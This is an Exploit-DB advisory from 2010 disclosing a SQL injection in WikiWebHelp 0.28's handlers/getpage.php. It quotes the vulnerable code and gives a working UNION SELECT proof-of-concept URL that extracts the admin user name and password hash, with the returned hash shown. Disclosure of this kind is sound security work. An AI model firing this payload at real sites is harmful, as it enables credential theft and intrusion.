WikiWebHelp 0.28 - SQL Injection

EDB-ID:

14217




Platform:

PHP

Date:

2010-07-05


# Version: v0.28 (Possible all versions)
# Vendor: Richard Bondi - http://wikiwebhelp.org
# Download: http://wikiwebhelp.org/release/wwh-0.2.8.zip

# Description: "The goal of this project is to create a help
application that is editable by the community. Standard wiki systems
are great for many applications. The help application and the wiki is
an ideal marriage. The problem with the standard wiki in a help
application is that it leaves you jumping around and does not have the
smooth flow that we have with a desktop chm type viewer. This project
aims to return that smooth flow to your wiki based help application."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
        - Mail: security[AT]adeo.com.tr
        - Web: http://security.adeo.com.tr

# Vulnerability:
In the file named as getpage.php user input don't used in single quotes.

handlers/getpage.php
---[snip]---
4	if($page==null) $page = $_GET['id'];

5	

6	$sql = "SELECT * FROM page INNER JOIN node ON
node.node_id=page.node_id WHERE node.node_id=$page";
---[snip]---

Its successfully exploitable. Please see # PoC section.

# PoC:
Request: http://server/handlers/getpage.php?id=9999999+UNION+SELECT+1,CONCAT_WS(0x3a,user_name,password),3,4,5,6,7+FROM+user+LIMIT+1

Response: admin:21232f297a57a5a743894a0e4a801fc3